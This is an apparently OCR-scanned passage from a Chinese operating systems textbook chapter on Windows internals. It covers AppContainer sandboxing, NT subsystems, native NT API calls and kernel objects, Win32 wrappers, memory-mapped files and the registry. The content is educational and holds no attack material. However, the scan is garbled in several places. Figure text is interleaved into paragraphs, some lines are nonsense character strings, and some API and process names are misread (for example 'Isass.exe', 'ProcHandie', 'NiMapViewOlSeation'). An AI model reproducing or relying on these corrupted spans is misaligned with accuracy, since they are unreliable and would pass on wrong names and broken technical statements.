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除 的 API， 如 ANSI API， 在 MSDK 中 也 被 删除 了 。MSDK API 只 支持 Unicode。 

选择 使 用 “现代 ”(modern) 这 样 的 词语 来 形容 新 的 Windows 着 实 让 人 感到 惊喜 。 可 能 十 年 之 后 的 
Windows 产 品 会 采用 后 现代 (post-modern) 这 样 的 词语 来 形容 。 

不 同 于 传统 的 Win32 进 程 ， 运 行 现代 应 用 程序 的 进程 的 生命 周期 由 操作 系统 管理 着 。 当 用 户 切 换 应 
用 程序 时 ， 操 作 系 统 会 给 予 这 个 线程 几 秒 的 时 间 用 于 保存 状态 ， 然 后 在 用 户 切 换 回来 之 前 停止 给 予 这 个 
进程 更 多 的 资源 。 如 果 系 统 资源 出 现 比较 低 的 情况 ， 操 作 系统 甚至 会 释放 该 进程 占有 的 资源 ， 直 到 用 户 
重新 切换 回 这 个 进程 ， 操 作 系 统 才 会 重新 启动 该 进程 。 那 些 需要 在 后 台 运 行 的 程序 必须 采用 新 的 WinRT 
API 进 行 编写 。 为 了 节省 电力 以 及 阻止 后 台 程 序 影 响 前 台 正 在 被 用 户 使 用 的 程序 ， 这 些 后 台 程 序 被 操作 
系统 小 心地 管理 着 。 这 些 改动 都 是 为 了 使 得 Windows 在 移动 端 表 现 得 更 好 。 

在 Win32 桌 面 上 ， 应 用 程序 是 通过 运行 安装 程序 (安装 程序 属于 应 用 程序 的 一 部 分 ) 进行 部 署 的 。 
现代 应 用 程序 必须 使 用 Windows 应 用 商店 中 的 程序 进行 安装 ， 这 些 部 署 的 应 用 程序 由 开发 商 上 传 到 微软 
在 线 商店 中 。 微 软 完全 遵循 了 苹果 推出 的 成 功 模式 ， 这 种 模式 也 被 安 卓 所 采用 。 除 非 应 用 程序 通过 验证 ， 
否则 微软 公司 不 允许 它们 进入 商店 ， 在 一 系列 检查 中 ， 微 软 公司 确保 应 用 程序 仅 使 用 MSDK 提 供 的 API。 

当 一 个 现代 应 用 程序 正在 运行 时 ， 它 永远 在 一 个 叫 作 AppContainer 的 沙 盒 里 被 运行 。 使 用 沙 盒 进 
程 来 运行 程序 是 为 了 安全 性 的 考虑 ， 它 可 以 隔离 那些 不 太 被 信任 的 代码 ， 以 防止 其 试图 自 改 操作 系统 或 
用 户 数据 。AppContainer 把 每 一 个 应 用 程序 都 看 成 一 个 新 的 用 户 ， 然 后 采用 Windows 安 全 功能 来 防止 其 
随便 地 访问 系统 资源 。 当 一 个 应 用 程序 需要 系统 资源 时 ， 可 以 采用 WinRT API 中 包含 的 功能 来 与 中 介 进 
程 (broker process) 进行 通信 ， 这 些 进程 拥有 大 部 分 操作 系统 的 访问 权限 ， 例 如 用 户 的 文件 。 

如 图 11-5 所 示 ，NT 子 系统 由 四 部 分 组 成 : 子 系统 进程 、 程 序 库 、 创 建 进程 (CreateProcess) HF, 
内 核 支持 。 一 个 子 系统 进程 只 是 一 个 服务 。 它 唯一 特殊 的 性 质 就 是 通过 smss.exe 程 序 (一 个 由 NT 启动 的 
初始 用 户 态 程序 ) 开始 ， 以 响应 来 自 Win32 的 CreateProcess 或 不 同 子 系统 中 相应 API 的 请 求 。 尽 管 
Win32 是 唯一 保留 支持 的 子 系统 ， 但 Windows 仍 然 对 子 系统 模块 进行 了 维护 ， 这 也 包括 了 csrss.exeWin32 
子 系统 进程 。 









子 系统 运行 时 库 
(CreateProcess 钧 子 ) 





子 系统 内 核 支 持 







本 地 过 程 调用 (LPC) 
原生 NT 系统 服务 





NTOS 执 行 体 ， 


图 11-5 用 于 构建 NT 子 系统 的 模块 


这 组 库 实现 了 特定 于 系统 的 高 级 操作 系统 功能 ， 并 包含 了 使 用 子 系统 (在 左 侧 显 示 ) 和 子 系统 进程 
本 身 之 间 进 行 通信 的 桩 程序 (在 右 侧 显示 ) 。 对 子 系统 进程 的 调用 通常 采用 内 核 模 式 本 地 过 程 调用 
(Local Procedure Call, LPC) 所 提供 的 功能 ， 它 实现 了 跨 进程 的 进程 调用 。 

在 Win32 CreateProcess 中 的 钧 子 函 数 (hook) 通过 查看 二 进 制图 像 来 检测 子 系统 中 每 个 程序 的 请 
求 。 通 过 smss.exe 启 动 子 系统 进程 csrss.exe (如 果 它 没有 运行 )。 然 后 子 系统 进程 开始 加 载 程序 。 

NT 内 核 有 很 多 一 般 用 途 的 设备 ， 可 以 用 来 编写 操作 系统 特定 的 子 系统 。 但 是 为 了 准确 地 执行 每 一 个 
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子 系统 还 需要 加 入 一 些 特殊 的 代码 。 例 如 ， 原 生 NtCreateProcess 系 统 调用 通过 重复 使 用 进程 实现 POSIX 
fork 函 数 调用 ， 内 核 提 供 一 个 Win32 特 殊 类 型 串 表 atoms， 通 过 进程 有 效 实现 只 读 字 符 串 的 共享 。 

子 系统 进程 是 原生 NT 程序 ， 其 使 用 NT 内 核 和 核心 服务 提供 的 本 地 系统 调用 ， 例 如 smss.exe 和 
Isass.exe (本 地 安全 管理 ) 。 


11.2.1 原生 NT 应 用 编程 接口 

像 所 有 的 其 他 操作 系统 一 样 ，Windows 也 拥有 一 套 系 统 调 用 。 它 们 在 Windows 的 NTOS 层 实施 ， 在 
内 核 态 运行 。 微 软 没 有 公布 原生 系统 调用 的 细节 。 它 们 被 操作 系统 内 部 一 些 底层 程序 使 用 ， 这 些 底 层 程 
序 通常 是 以 操作 系统 的 一 部 分 (主要 是 服务 和 子 系统 )， 或 者 是 内 核 态 的 设备 驱动 程序 的 形式 交付 的 。 
原生 NT 系统 调用 在 版 本 的 升级 中 并 没有 太 大 的 改变 ， 但 是 微软 并 没有 选择 公开 ，Windows 的 应 用 程序 都 
是 基于 Win32 的 ， 因 此 Win32 API 在 不 同 Windows 操 作 系统 中 是 通用 的 ， 从 而 能 够 让 这 些 应 用 程序 在 基 
于 MS-DOS 和 基于 NT 的 Windows 系 统 中 正确 运行 。 

大 多 数 原生 NT 系统 调用 都 是 对 内 核 态 对 象 进行 操作 的 ， 包 括 文件 、 进 程 、 线 程 、 管 道 、 信 号 量 等 。 
图 11-6 中 给 出 了 一 些 Windows 中 的 常见 内 核 态 对 
象 。 以 后 ， 我 们 讨论 内 核对 象 管理 器 时 ， 会 讨论 


具体 对 象 类 型 细节 。 信号 量 、 互 斥 量 、 事 件 、IPC 端 口 、 

有 时 使 用 术语 “对 象 ”来 指 代 操 作 系统 所 VO 完成 队列 
控制 的 数据 结构 ， 这 样 就 会 造成 困惑 ， 因 为 错误 
理解 成 面向 对 象 Ta 操作 系统 的 对 象 提供 了 
数据 隐藏 和 抽象 ， 但 是 缺少 一 些 面向 对 象 体 系 的 
基本 性 质 ， 如 继承 和 多 态 性 。 图 11-6 常见 的 内 核 态 对 象 类 别 

在 原生 NT API 中 存在 创建 新 的 内 核 态 对 象 
或 操作 已 经 存在 的 对 象 的 调用 。 每 次 创建 和 打开 对 象 的 调用 都 返回 一 个 句柄 (handle) 给 调用 者 (caller), 
句柄 可 在 接 下 来 用 于 执行 对 象 的 操作 。 句 柄 是 特定 于 创建 它们 的 具体 进程 的 。 通 常 句柄 不 可 以 直接 交 给 
其 他 进程 ， 也 不 能 用 于 同一 个 对 象 。 然 而 ， 在 某 些 情况 下 通过 一 个 受 保护 的 方法 有 可 能 把 一 个 句柄 复制 
到 其 他 进程 的 句柄 表 中 进行 处 理 ， 人 允许 进 程 共享 访问 对 象 一 即使 对 象 在 名 字 空 间 无 法 访问 。 复 制 句柄 
的 进程 必须 有 来 源 和 目标 进程 的 句柄 。 

每 一 个 对 象 都 有 一 个 和 它 相 关 的 安全 描述 信息 ， 详 细 指 出 对 于 特定 的 访问 请 求 ， 什 么 对 象 能 够 或 者 
不 能 够 针对 一 个 特定 的 目标 进行 何 种 操作 。 当 句柄 在 进程 之 间 复 制 的 时 候 ， 可 添加 特定 于 被 复制 句柄 的 
访问 限制 。 从 而 一 个 进程 能 够 复制 一 个 可 读 写 的 句柄 ， 并 在 目标 进程 中 把 它 改变 为 只 读 的 版 本 。 

并 不 是 所 有 系统 创建 的 数据 结构 都 是 对 象 ， 并 不 是 所 有 的 对 象 都 是 内 核对 象 。 那 些 真正 的 内 核 态 对 
象 是 那些 需要 命名 、 保 护 或 以 某 种 方式 共享 的 对 象 。 通 常 ， 这 些 内 核 态 对 象 表示 了 在 内 核 中 的 某 种 编程 
抽象 。 每 一 个 内 核 态 的 对 象 有 一 个 系统 定义 类 型 ， 有 明确 界定 的 操作 ， 并 占用 内 核 内 存 。 虽 然 用 户 态 的 
程序 可 以 执行 操作 (通过 系统 调用 ) ， 但 是 不 能 直接 得 到 数据 。 

图 11-7 为 一 些 原 生 API 的 示例 ， 通 过 特定 的 句柄 操作 内 核对 象 ， 如 进程 、 线 程 、IPC 端 口 和 内 存 区 
(用 来 描述 可 以 映射 到 地 址 空间 的 内 存 对 象 ) 。NtCreateProcess 返 回 一 个 创建 新 进程 对 象 的 句柄 ， 
SectionHandle 代 表 一 个 执行 实例 程序 。ExceptionPortHandle 用 来 在 错误 出 现 且 没 有 被 调试 器 处 理 时 与 
子 系统 进行 通信 ，DebugPort Handle 用 来 在 出 现 异 常 〈 例 如 ， 除 零 或 者 内 存 访问 越界 ) 之 后 把 进程 控 
制 权 交 给 调试 器 的 过 程 中 与 调试 器 通信 。 

NtCreate 线 程 需要 ProcHandle， 因 为 ProcHandie 可 以 在 任意 一 个 含有 句柄 的 进程 中 (有 足够 的 访 
问 权 限 ) 创建 线程 。 同 样 ，NtAllocateVirtualMemory、NtMapViewOfSection、NtReadVirtualMemory 
和 NtWriteVirtualMemory 可 使 进程 不 仅 操 作 自 己 的 地 址 空间 ， 也 可 以 分 配 虚 拟 地 址 和 映射 段 ， 还 可 以 读 
写 其 他 进程 的 虚拟 内 存 。NtCreateFile 是 一 个 内 部 API 调 用 ， 用 来 创建 或 打开 文件 。NtDuplicate- 
Object， 可 以 在 不 同 的 进程 之 间 复 制 句 柄 的 API 调 用 。 

当然 不 是 只 有 Windows 有 内 核 态 对 象 。UNIX 系 统 也 同样 支持 内 核 态 对 象 ， 例 如 文件 、 网 络 数据 包 、 
管道 、 设 备 、 进 程 、 共 享 内 存 的 IPC 设 备 、 消 息 端口 、 信 号 和 IO 设备 。 在 UNIX 中 有 各 种 各 样 的 方式 命 
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NtCreateProcess(&ProcHandle, Access, SectionHandle, DebugPortHandle, ExceptPortHandle, ...) 
NtCreateThread(&ThreadHandle, ProcHandle, Access, ThreadContext, CreateSuspended, ...) 
NtAllocateVirtualMemory(ProcHandle, Addr, Size, Type, Protection, ...) 
NtMapViewOfSection(SectHandle, ProcHandle, Addr, Size, Protection, ...) 
NtReadVirtualMemory(ProcHandle, Addr, Size, ...) 

NtWriteVirtualMemory(ProcHandle, Addr, Size, ...) 

NtCreateFile(&FileHandle, FileNameDescriptor, Access, ...) l 
| NtDuplicateObject(srcProcHandle, srcObjHandle, dstProcHandle, dstObjHandle, ...) 


图 11-7 在 进程 之 间 使 用 句柄 来 管理 对 象 的 原生 NT API 调 用 示例 


名 和 访问 对 象 ， 例 如 文件 描述 符 、 进 程 ID、SystemV IPC 对 象 的 整 型 ID 和 设备 节点 。 每 一 类 的 UNIX 对 
象 的 实现 是 特定 于 其 类 别 的 。 文 件 和 socket 使 用 不 同 的 设施 (facility) ， 并 且 是 SystemV IPC 机 制 、 程 序 、 
装置 之 外 的 。 

Windows 中 的 内 核对 象 使 用 一 个 基于 NT 名 字 空 间 中 关于 对 象 的 句柄 和 命名 统一 设备 来 指 代 内 核对 
象 ， 而 且 使 用 一 个 统一 的 集中 式 对 象 管理 器 。 句 柄 是 进程 特定 的 ， 但 正如 上 文 所 述 ， 可 以 被 另 一 个 进程 
使 用 。 对 象 管理 器 在 创建 对 象 时 可 以 给 对 象 命 名 ， 可 以 通过 名 字 打 开 对 象 的 句柄 。 

对 象 管理 器 在 NT 名 字 空 间 中 使 用 unicode ( 宽 位 字符 ) 命名 。 不 同 于 UNIX，NT 一 般 不 区 分 大 小 写 
( 它 保 留 大 小 写 但 不 区 分 )。NT 名 字 空 间 是 一 个 分 层 树 形 结构 的 目录 ， 表 示 联 系 和 对 象 。 

对 象 管理 器 提供 统一 的 管理 同步 、 安 全 和 对 象 生 命 期 的 设备 。 对 于 对 象 管理 器 提供 给 用 户 的 一 般 设 
备 是 否 能 为 任何 特定 对 象 的 用 户 所 获得 ， 这 是 由 执行 体 部 件 来 决定 的 ， 它 们 都 提供 了 操纵 每 一 个 对 象 类 
型 的 内 部 API。 

这 不 仅 是 应 用 程序 使 用 对 象 管理 器 中 的 对 象 。 操 作 系 统 本 身 也 创建 和 使 用 对 象 一 一 而 且 非 常 多 。 大 
多 数 这 些 对 象 的 创建 是 为 了 让 系统 的 某 个 部 分 存储 相当 一 段 长 时 间 的 信息 或 者 将 一 些 数据 结构 传递 给 其 
他 的 部 件 ， 但 这 都 受益 于 对 象 管理 器 对 命名 和 生存 周期 的 支持 。 例 如 ， 当 一 个 设备 被 发 现 ， 一 个 或 多 个 
设备 对 象 被 创建 以 代表 该 设备 ， 并 在 理论 上 说 明 该 设备 如 何 连 接 到 系统 的 其 他 部 分 。 为 了 控制 设备 而 加 
载 设备 的 驱动 程序 ， 创 建 驱动 程序 对 象 用 来 保存 属性 和 提供 驱动 程序 所 实现 的 函数 的 指针 ， 这些 函 数 是 
实现 对 1/O 请 求 的 处 理 。 操 作 系 统 中 在 以 后 使 用 其 对 象 时 会 涉及 这 个 驱动 。 驱 动 也 可 以 直接 通过 名 字 来 
访问 ， 而 不 是 间接 的 通过 它 所 控制 的 设备 来 访问 的 (例如 ， 从 用 户 态 来 设置 控制 它 的 操作 的 参数 )。 

不 像 UNIX 把 名 字 空 间 的 根 放 在 了 文件 系统 中 ，NT 的 名 字 空 间 则 是 保留 在 了 内 核 的 虚拟 内 存 中 。 这 
意味 着 NT 在 每 次 系统 启动 时 ， 都 得 重新 创建 最 上 层 的 名 字 空 间 。 内 核 虚拟 内 存 的 使 用 ， 使 得 NT 可 以 把 
信息 存储 在 名 字 空 间 里 ， 而 不 用 首先 启动 文件 系统 。 这 也 使 得 NT 更 加 容易 地 为 系统 添加 新 类 型 的 内 核 
态 的 对 象 ， 原 因 是 文件 系统 自身 的 格式 不 需要 为 每 种 新 类 型 的 目标 文件 进行 改变 。 

一 个 命名 的 目标 文件 可 以 标记 为 永久 性 的 ， 这 意味 着 这 个 文件 会 一 直 存 在 ， 即 使 在 没有 进程 的 句柄 
指向 该 对 象 条 件 下 ， 除 非 它 被 删除 或 者 系统 重新 启动 。 这 些 对 象 甚至 可 以 通过 提供 parse 例 程 来 扩展 NT 
的 名 字 空 间 ， 这 种 例 程 方式 类 似 于 允许 对 象 具 有 UNIX 中 挂 载 点 的 功能 。 文 件 系 统 和 注册 表 使 用 这 个 工 
具 在 NT 的 名 字 空 间 上 挂 载 卷 和 储 集 。 访 问 到 一 个 卷 的 设备 对 象 即 访问 了 原始 卷 (raw volume) ， 但 是 设 
备 对 象 也 可 以 表明 一 个 卷 可 以 加 载 到 NT 名 字 空 间 中 去 。 卷 上 的 文件 可 以 通过 把 卷 相 关 文 件 名 加 在 卷 所 
对 应 的 设备 对 象 的 名 称 后 面 来 访问 。 

永久 性 名 字 也 用 来 描述 同步 的 对 象 或 者 共享 内 存 ， 因 此 它们 可 以 被 进程 共享 ， 避 免 了 当 进 程 频繁 启 
动 和 停止 时 来 不 断 重建 。 设 备 文件 和 经 常 使 用 的 驱动 程序 会 被 给 予 永久 性 名 字 ， 并 且 给 予 特 殊 索 引 节 点 
持久 属性 ， 这 些 索 引 节 点 保存 在 UNIX 的 /dev 目 录 下 。 

我 们 将 在 下 一 节 中 描 叙 纯 NT API 的 更 多 特征 ， 讨 论 Win32 API 在 NT 系统 调用 的 封装 性 。 

11.2.2 Win32 应 用 编程 接口 

Win32 函 数 调用 统称 为 Win32 API 接 口 。 这 些 接 口 已 经 被 公布 并 且 详 细 地 写 在 了 文档 上 。 这 些 接 口 

在 调用 的 时 候 采 用 库 文件 链接 流程 : 通过 封装 来 完成 原始 NT 系统 调用 ， 有 些 时 候 也 会 在 用 户 态 下 工作 。 
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虽然 原始 API 没 有 公布 ， 但 是 这 些 API 的 功能 可 以 通过 公布 的 Win32 API 来 调用 实现 。 随 着 新 的 Windows 版 
本 的 更 新 ， 更 多 的 API 函 数 相应 增加 ， 但 是 原先 存在 











的 API 调 用 却 很 改变， 即使 Windows 进 行 了 天 级。 。 creatabpees | NEAR 
图 11-8 表 示 出 各 种 级 别 的 Win32 API 调 用 以 及 | GreateThread NtCreateThread 

它们 封装 的 原生 API 调 用 。 最 有 趣 的 部 分 是 关于 图 SuspendThread NtSuspendThread 

上 令 人 乏味 的 映射 。 许 多 低级 别 的 Win32 函 数 有 相 CreateSemaphore NtCreateSemaphore 


对 应 的 原生 NT 函数 ， 这 一 点 都 不 奇怪 ， 因 为 Win32 ReadFile NtReadFile 
就 是 为 原生 NT API 设 计 的 。 在 许多 例子 中 ，Win32 NtSetInformationFile 
函数 层 必 须 利 用 Win32 的 参数 传递 给 NT 内 核 函 数 。 CreateFileMapping NtCreateSection 




















lin, STORE A JF FLOR SINTANARI IE, DA Hovin | NiMapViewOlSeation 

殊 的 MS-DOS 设 备 〈 如 LPT:)。 当 创建 进程 和 线程 DumplicateHandle | NtDuplicateObject 

时 ， 使 用 的 Win32 API 函 数 必须 通知 Win32 子 系统 CloseHandle NtClose 

进程 csrss.exe， 告 知 它 有 新 的 进程 和 线程 需要 它 来 Then ee a 

监督 ， 就 像 我 们 在 11.4 节 里 描述 的 那样 。 I WI 
一 些 Win32 调 用 使 用 路 径 名 ， 然 而 相关 的 NT 内 API 调 用 示例 


核 调用 使 用 句柄 。 所 以 这 些 封装 流程 包括 打开 文件 ， 调 用 NT 内 核 ， 最 后 关闭 句柄 。 封 装 流程 同时 包括 把 
Win32 API 从 ANSI 编 码 变 成 Unicode 编 码 。 在 图 11-8 的 Win32 函 数 里 使 用 字符 串 作 参数 的 实际 上 是 两 套 APL， 
例如 参数 CreateProcessW 和 CreateProcessA。 当 这 些 参数 要 传递 到 下 一 个 API 时 ， 这 些 字符 串 必 须 翻 译 成 
Unicode 编 码 ， 因 为 NT 内 核 调 用 只 认识 Unicode。 

因为 已 经 存在 的 Win32 接 口 很 少 随 着 操作 系统 的 改变 而 改变 ， 所 以 从 理论 上 说 能 在 前 一 个 版 本 系统 
上 运行 的 程序 也 能 正常 地 在 新 版 本 的 系统 上 运行 。 可 在 实际 情况 中 ,依然 经 常 存在 新 系统 的 兼容 性 问题 。 
Windows 太 复杂 了 以 至 于 有 些 表面 上 不 合 逻 辑 的 改动 会 导致 应 用 程序 运行 失败 。 应 用 程序 本 身 也 有 问题 ， 
例如 , 它们 也 经 常 做 细致 的 操作 系统 版 本 检查 或 者 本 身 就 有 潜在 的 问题 只 不 过 是 在 新 系统 上 暴露 出 来 了 。 


” 然而 ,微软 依旧 尽力 在 每 个 版 本 上 测试 不 同 的 兼容 性 问题 ， 并 且 力 图 提供 特定 的 解决 办 法 。 


Windows 支 持 两 种 特殊 环境 ， 两 种 都 叫 作 WOW。WOW32 通 过 映射 16 位 系统 调用 与 参数 到 32 位 ， 来 
在 32 位 x86 系 统 用 16 位 Windows 3.x 应 用 程序 。 同 样 ，WOW64 人 允许 32 位 的 程序 在 x64 架 构 的 系统 上 运行 。 

Windows API 体 系 不 同 于 UNIX 体 系 。 对 于 后 者 来 说 ， 操 作 系统 函数 很 简单 ， 只 有 很 少 的 参数 以 及 
很 少 的 方法 来 执行 同样 的 操作 ， 从 而 可 以 有 很 多 途径 来 完成 同样 的 操作 。Win32 提 供 了 非常 广泛 的 接口 
和 和 参数， 常常 能 通过 三 四 种 方法 来 做 同样 的 事情 ， 同 时 把 低级 别 和 高 级 别 的 函数 混合 到 一 起 ， 例 如 
CreateFile 和 CopyFile 。 

这 意味 着 Win32 提 供 了 一 组 非常 多 的 接口 ， 但 是 这 也 增加 了 复杂 度 ， 原 因 是 在 同一 个 API 中 精 糕 的 
系统 分 层 以 及 高 低级 别 函 数 的 混合 。 为 了 学 习 操作 系统 ， 我 们 仅仅 关注 那些 封装 了 相关 的 NT 内 核 API 的 
低级 别 的 Win32 API。 

Win32 有 创建 和 管理 进程 和 线程 的 调用 。Win32 也 有 许多 进程 内 部 通信 的 调用 ， 例 如 创建 、 销 毁 、 
互 斥 、 信 号 、 通 信 接 口 和 其 他 IPC 实 体 。 

虽然 大 量 的 内 存 管理 系统 对 程序 员 来 说 是 看 不 见 的 ， 但 是 一 个 重要 的 特征 是 可 见 的 : 一 个 进程 把 文 
件 映射 到 虚拟 内 存 的 一 块 区 域 上 。 这 样 允 许 线程 可 以 使 用 指针 来 读 写 部 分 文件 ， 而 不 必 执 行 在 硬盘 和 内 
存 之 间 具 体 的 读 写 数据 操作 。 通 过 内 存 映射 ， 内 存 系统 可 以 根据 需求 来 执行 IO 操作 (要 求 分 页 ) 。 

Windows 处 理 内 存 映 射 文件 使 用 三 种 完全 不 同 的 手段 。 第 一 种 ， 它 提供 允许 进程 管理 它们 自己 虚 
拟 空间 的 接口 ， 包 括 预 留 地 址 范围 为 以 后 用 。 第 二 种 ，Win32 支 持 一 种 称 作文 件 映射 的 抽象 ， 这 用 来 代 
替 可 定位 的 实体 ， 如 文件 (文件 的 映射 在 NT 的 层次 中 称 作 section) 。 通 常 ， 文 件 映射 是 使 用 文件 句柄 来 
关联 文件 。 但 有 时 候 也 用 来 指向 分 页 系统 中 的 私有 页 面 。 

第 三 种 方法 是 把 文件 映射 的 视图 映射 到 一 个 进程 的 地 址 空间 。Win32 仅 仅 允 许 为 当前 进程 创建 一 个 
WA, 但 是 NT 潜在 的 手段 更 加 通用 ， 人 允许 为 任意 有 权限 句柄 的 进程 创建 视图 。 和 UNIX 中 的 mmap 相 比 ， 
要 区 分 开创 建文 件 映射 和 把 文件 映射 到 地 址 空间 的 操作 。 
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在 Windows 中 ,文件 映 射 的 内 核 态 实体 被 句柄 所 取代 。 就 像 许 多 句 栖 一样， 文件 映射 能 够 被 复制 到 
其 他 进程 中 去 。 这 些 进程 中 的 任意 一 个 能 够 根据 需求 映射 文件 到 自己 的 地 址 空间 中 。 这 对 共享 进程 间 的 
私有 内 存 是 非常 有 用 的 ， 而 且 不 必 再 创建 文件 来 实现 。 在 NT 层 ， 文 件 的 映射 (sections) 也 和 NT 名 字 空 
间 保 持 一 致 ， 能 够 通过 文件 名 来 访问 。 

对 许多 程序 来 说 ， 一 个 重要 的 领域 是 文件 IO 操作 。 在 Win32 基 本 视图 中 ， 一 个 文件 仅仅 是 一 组 有 顺 
序 的 字 节 流 。Win32 提 供 超过 60 种 调用 来 创建 和 删除 文件 和 目录 、 打 开关 闭 文件 、 读 写 文 件 、 提 取 设 置 
文件 属性 、 锁 定 字 节 流 范围 以 及 更 多 基础 操作 的 功能 ， 这 些 功 能 基于 文件 系统 的 组 织 以 及 文件 的 各 自 访 
问 权限 。 

还 有 更 高 级 的 处 理 文件 数据 的 方法 。 除 了 主要 的 文件 流 ， 存 在 NTFS 文 件 系统 上 的 文件 可 以 拥有 额 
外 的 文件 流 。 文 件 (其 至 包括 整个 卷 ) 可 以 被 加 密 。 文 件 可 以 被 压缩 成 为 一 组 相对 稀疏 的 字 节 流 ， 从 而 
节省 磁盘 空间 。 不 同 硬盘 的 文件 系统 的 卷 可 以 通过 使 用 不 同 级 别 的 RAID 存 储 而 组 织 起 来 。 修 改 文 件 或 
者 目录 可 以 通过 一 种 直接 通知 的 方式 来 实现 ， 或 者 通过 读 NTFS 为 每 个 卷 维 护 的 日 志 来 实现 。 

每 个 文件 系统 的 卷 默认 挂 载 在 NT 的 名 字 空 间 里 ， 根 据 卷 的 名 字 来 排列 。 因 此 ， 一 个 文件 \foo\bar 可 
以 命名 成 \Device\HarddiskVolume\foo\bar。 对 于 NTFS 的 卷 来 说 ， 挂 载 点 (Windows 称 作 再 分 解 点 ) 和 符 
号 链接 用 来 帮助 组 织 卷 。 

低级 别 的 Windows IO 模式 基本 上 是 异步 的 。 一 旦 一 个 IO 操作 开始 ， 系 统 调用 将 允许 线程 对 IO 操 
作 进 行 初始 化 并 且 开 始 LO 操作 。Windows 支 持 取 消 操作 ， 以 及 一 系列 的 不 同 机 制 来 支持 线程 和 IO 操作 
完成 之 后 的 同步 。Windows 也 人 允许 程序 规定 在 文件 打开 时 IO 操作 必须 同步 ， 许 多 库 函 数 ， 例 如 C 库 和 许 
多 Win32 调 用 ， 也 规定 IO 的 同步 已 支持 兼容 性 或 者 简化 编程 模型 。 在 这 些 情况 下 ， 执 行 体会 在 返回 到 用 
户 态 前 和 IO 操作 结束 时 进行 同步 。 

Win32 提 供 的 另 一 些 调 用 是 安全 性 相关 的 。 每 个 线程 将 和 一 个 内 核对 象 进 行 捆绑 , 称 作 令 牌 (token), 
这 个 令 牌 提供 关于 该 线程 的 身份 和 权限 相关 的 信息 。 每 个 目标 可 以 有 一 个 ACL (访问 权限 控制 列表 ) , 
这 个 列表 详细 描述 了 哪 种 用 户 有 权限 访问 并 且 对 其 进行 操作 。 这 种 方式 通过 了 一 种 细 粒 度 的 安全 机 制 ， 
可 以 指定 具体 哪些 用 户 可 以 或 者 禁止 访问 特定 的 对 象 。 这 种 安全 模式 是 可 以 扩展 的 ， 人 允许 应 用 程序 添加 
新 的 安全 规则 ， 例 如 限制 访问 时 间 。 

Win32 的 名 字 空 间 不 同 于 前 面 描述 的 NT 内 核 名 字 空 间 。NT 内 核 空间 仅仅 只 有 一 部 分 对 Win32 APIK 
数 可 见 (即使 整个 NT 名 字 空 间 可 以 通过 Win32 使 用 特殊 字符 串 来 访问 ， 如 “\.”)。 在 Win32 中 ， 文 件 访 
问 权 限 和 驱动 器 号 相关 。NT 目 录 \DosDevices 里 包含 了 对 一 个 从 驱动 器 号 到 实际 设备 对 象 的 数 个 符号 链 
接 。 例 如 ，\DosDevices\C: 是 指向 \Device\HarddiskVolume1。 这 个 目录 同样 也 包含 了 其 他 Win32 设 备 的 链 
接 ， 如 COM1:、LPT1: 和 NUL: (端口 号 和 打印 端口 ， 以 及 非常 重要 的 空 设备 ) 。\DosDevices 是 一 个 真正 
指向 \?? 的 链接 ， 这 样 有 利于 提高 效率 。 另 外 一 个 NT 文件 夹 ，\BaseNamedObjects 用 来 存储 各 种 各 样 的 内 
核对 象 ， 这 些 文件 可 以 通过 Win32 API 来 访问 。 这 些 对 象 包括 用 来 同步 的 对 象 ， 如 信号 、 共 享 内 存 、 定 
时 器 以 及 通信 端口 ，MS-DOS 和 设备 名 称 。 

对 于 底层 系统 接口 ， 我 们 额外 说 一 下 ，Win32 API 也 支持 许多 GUI 操 作 ， 包 括 系 统 所 有 图 形 接 口 的 
调用 。 有 对 窗口 的 创建 、 挫 毁 、 管 理 和 使 用 的 调用 ， 以 及 支持 菜单 、 工 具 条 、 状 态 栏 、 滚 动 条 、 对 话 框 、 
图 标 和 许多 在 屏幕 上 显示 的 元 素 。Win32 还 提供 调用 来 画 几 何 图 形 、 填 充 、 使 用 调 色 板 、 处 理 文字 以 及 
在 屏幕 上 放置 图 标 等 。 也 支持 对 键盘 鼠标 和 其 他 输入 设备 的 响应 ， 如 音频 、 打 印 等 其 他 输出 设备 。 

GUI 操作 直接 使 用 win32k.sys 驱 动 ， 这 个 驱动 使 用 特殊 的 函数 从 用 户 态 去 访问 内 核 态 的 接口 。 因 为 
这 些 调用 不 包含 NT 操作 系统 中 的 系统 调用 ， 我 们 将 不 会 详细 讨论 。 

11.2.3 Windows 注册 表 

名 字 空 间 的 根 在 内 核 中 维护 。 存 储 设备 ， 如 系统 的 卷 ， 附 属于 名 字 空 间 中 。 因 为 名 字 空 间 会 因为 系 
统 的 每 次 启动 重新 构建 ， 那 么 系统 怎么 知道 系统 配置 的 细节 呢 ? 答案 就 是 Windows 会 挂 载 一 种 特殊 的 文 
件 系统 (为 小 文件 做 了 优化 ) 到 名 字 空 间 。 这 个 文件 系统 称 作 注册 表 (registry) 。 注 册 表 被 组 织 成 了 不 
EWE, WER (hive)。 每 个 储 梨 保 存在 一 个 单独 文件 中 (在 启动 卷 的 目录 C:\Windows\ system32\ 
config\ 下 )。 当 Windows 系 统 启 动 时 ， 一 个 叫 作 SYSTEM 的 特殊 储 梨 被 装 入 了 内 存 ， 这 是 由 装载 内 核 和 
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其 他 启动 文件 (例如 位 于 启动 盘 的 驱动 程序 ) 的 程序 来 完成 。 

Windows 在 系统 储 梨 里 面 保存 了 大 量 的 重要 信息 ， 包 括 驱 动 程序 去 驱使 什么 设备 工作 ， 什 么 软件 进 
行 初始 化 ， 以 及 什么 变量 来 控制 操作 系统 的 操作 等 。 这 些 信息 其 至 被 启动 程序 自己 用 来 决定 哪些 驱动 程 
序 是 用 于 启动 的 驱动 ， 哪 些 必须 立即 需要 启动 。 这 些 驱 动 包括 操作 系统 自身 来 识别 文件 系统 和 磁盘 驱动 
的 程序 。 

其 他 配置 储 集 用 在 系统 启动 后 ， 描 述 系统 安装 的 软件 的 信息 ， 特 别 是 用 户 和 用 户 态 下 安装 在 系统 上 
的 COM (Component Object-Model)。 本 地 用 户 的 登录 信息 保存 在 SAM (安全 访问 管理 器 ) 中 。 网 络 用 
户 的 信息 保存 在 lsass 服 务 中 ， 和 网 络 服 务 器 文件 夹 一 起 ， 用 户 可 以 通过 上 述 两 种 配置 拥有 一 个 访问 网 络 
的 用 户 名 和 密码 。Windows 的 储 集 列表 在 图 11-9 中 显示 。 




































使 用 
HKLM\SYSTEM OS 配置 信息 ， 供 内 核 使 用 
HKLM\HARDWARE 记录 探测 到 的 设备 的 内 存储 中 





















HKLM\BCD* 
HKLM\SAM 


SECURITY HKLM\SECURITY 


DEFAULT HKLM_USERS\.DEFAULT 
NTUSER.DAT HKLM_USERS\<user id> 
